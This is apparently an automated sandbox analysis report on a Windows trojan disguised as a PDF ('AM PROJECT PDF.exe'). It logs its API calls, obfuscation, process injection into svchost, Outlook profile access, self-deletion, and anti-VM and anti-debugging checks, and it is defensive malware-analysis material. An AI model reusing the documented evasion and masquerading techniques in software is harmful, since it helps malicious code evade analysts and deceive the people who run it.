Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9540 NtReadFile,LdrInitializeThunk, 6_2_011A9540
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A95D0 NtClose,LdrInitializeThunk, 6_2_011A95D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_011A9710
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_011A9780
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_011A97A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_011A9FE0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_011A9660
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_011A96E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9950 NtQueueApcThread, 6_2_011A9950
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A99D0 NtCreateProcessEx, 6_2_011A99D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9820 NtEnumerateKey, 6_2_011A9820
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AB040 NtSuspendThread, 6_2_011AB040
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A98A0 NtWriteVirtualMemory, 6_2_011A98A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9B00 NtSetValueKey, 6_2_011A9B00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA3B0 NtGetContextThread, 6_2_011AA3B0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A10 NtQuerySection, 6_2_011A9A10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A80 NtOpenDirectoryObject, 6_2_011A9A80
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AAD30 NtSetContextThread, 6_2_011AAD30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9520 NtWaitForSingleObject, 6_2_011A9520
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9560 NtWriteFile, 6_2_011A9560
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A95F0 NtQueryInformationFile, 6_2_011A95F0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA710 NtOpenProcessToken, 6_2_011AA710
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9730 NtQueryVirtualMemory, 6_2_011A9730
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA770 NtOpenThread, 6_2_011AA770
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9770 NtSetInformationFile, 6_2_011A9770
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9760 NtOpenProcess, 6_2_011A9760
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9610 NtEnumerateValueKey, 6_2_011A9610
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9650 NtQueryValueKey, 6_2_011A9650
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9670 NtQueryInformationProcess, 6_2_011A9670
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A96D0 NtCreateKey, 6_2_011A96D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E027 NtClose, 6_2_0041E027
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E0D7 NtAllocateVirtualMemory, 6_2_0041E0D7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004012A3 NtProtectVirtualMemory, 6_2_004012A3
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DEF7 NtCreateFile, 6_2_0041DEF7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DFA7 NtReadFile, 6_2_0041DFA7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E021 NtClose, 6_2_0041E021
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004014E9 NtProtectVirtualMemory, 6_2_004014E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DEF1 NtCreateFile, 6_2_0041DEF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DF49 NtCreateFile, 6_2_0041DF49
Sample file is different than original file name gathered from version info
Source: AM PROJECT PDF.exe Binary or memory string: OriginalFilename vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.305486469.0000000003451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315751087.0000000006D50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303350926.0000000002648000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.316811478.00000000070E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.300887127.0000000002451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303201456.0000000002631000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000000.249674589.00000000001A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315432245.0000000006C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000002.428411713.000000000125F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.299833951.00000000010BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.295891725.0000000000F28000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe Metadefender: Detection: 44%
Source: AM PROJECT PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe "C:\Users\user\Desktop\AM PROJECT PDF.exe"
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AM PROJECT PDF.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\262I-Au Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@2/2
Source: AM PROJECT PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: AM PROJECT PDF.exe String found in binary or memory: Database-helpToolStripMenuItem1
Source: AM PROJECT PDF.exe String found in binary or memory: Options-helpToolStripMenuItem2Help7userManualToolStripMenuItem
Source: AM PROJECT PDF.exe String found in binary or memory: tab_addresses'addresses_container#addresses_quick_1/addresses_quick_title_1
Source: AM PROJECT PDF.exe String found in binary or memory: %options_showsplash%Show Splash Screen%options_loadontabs/Load only on tab switch+options_loadhwonstart;Load hardware data on startup'options_loadonstart1Load all data on startup+options_weights_group!options_filterby%options_filter_lbl
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: AM PROJECT PDF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: AM PROJECT PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: AM PROJECT PDF.exe, MainWindow.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.AM PROJECT PDF.exe.b0000.0.unpack, MainWindow.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_02429888 push esp; ret 0_2_02429889
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011BD0D1 push ecx; ret 6_2_011BD0E4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041B152 push edi; iretd 6_2_0041B153
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041A124 push es; iretd 6_2_0041A141
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421279 push eax; ret 6_2_0042127F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041A202 push es; iretd 6_2_0041A208
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0042122C push eax; ret 6_2_0042127F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004212E3 push eax; ret 6_2_004212E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421282 push eax; ret 6_2_004212E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00422B3B push 0A05B974h; ret 6_2_00422BC6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040B404 push ecx; retf 6_2_0040B405
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004224C5 push edi; ret 6_2_004224D4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004054CD pushad ; ret 6_2_004054D9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040556E push ebp; retf 6_2_0040556F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004225D5 push ebx; ret 6_2_004225DB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421E04 push ds; iretd 6_2_00421E06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00409F74 push esp; ret 6_2_00409F7D
Source: initial sample Static PE information: section name: .text entropy: 6.846311012403682

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\svchost.exe File deleted: c:\users\user\desktop\am project pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AM PROJECT PDF.exe PID: 5088, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 772 Thread sleep time: -41226s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 676 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 rdtsc 6_2_01235BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe API coverage: 7.7 %
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 41226 Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II2VM Additions S3 Trio32/64
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMUTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.327111690.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.400886087.00000000050A1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IdentifierDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 rdtsc 6_2_01235BA5
Enables debug privileges
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h] 6_2_01169100
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h] 6_2_01169100
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h] 6_2_01169100
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119513A mov eax, dword ptr fs:[00000030h] 6_2_0119513A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119513A mov eax, dword ptr fs:[00000030h] 6_2_0119513A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov ecx, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118B944 mov eax, dword ptr fs:[00000030h] 6_2_0118B944
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118B944 mov eax, dword ptr fs:[00000030h] 6_2_0118B944
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B171 mov eax, dword ptr fs:[00000030h] 6_2_0116B171
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B171 mov eax, dword ptr fs:[00000030h] 6_2_0116B171
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C962 mov eax, dword ptr fs:[00000030h] 6_2_0116C962
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h] 6_2_012249A4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h] 6_2_012249A4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h] 6_2_012249A4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h] 6_2_012249A4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192990 mov eax, dword ptr fs:[00000030h] 6_2_01192990
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C182 mov eax, dword ptr fs:[00000030h] 6_2_0118C182
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A185 mov eax, dword ptr fs:[00000030h] 6_2_0119A185
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h] 6_2_011E51BE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h] 6_2_011E51BE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h] 6_2_011E51BE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h] 6_2_011E51BE
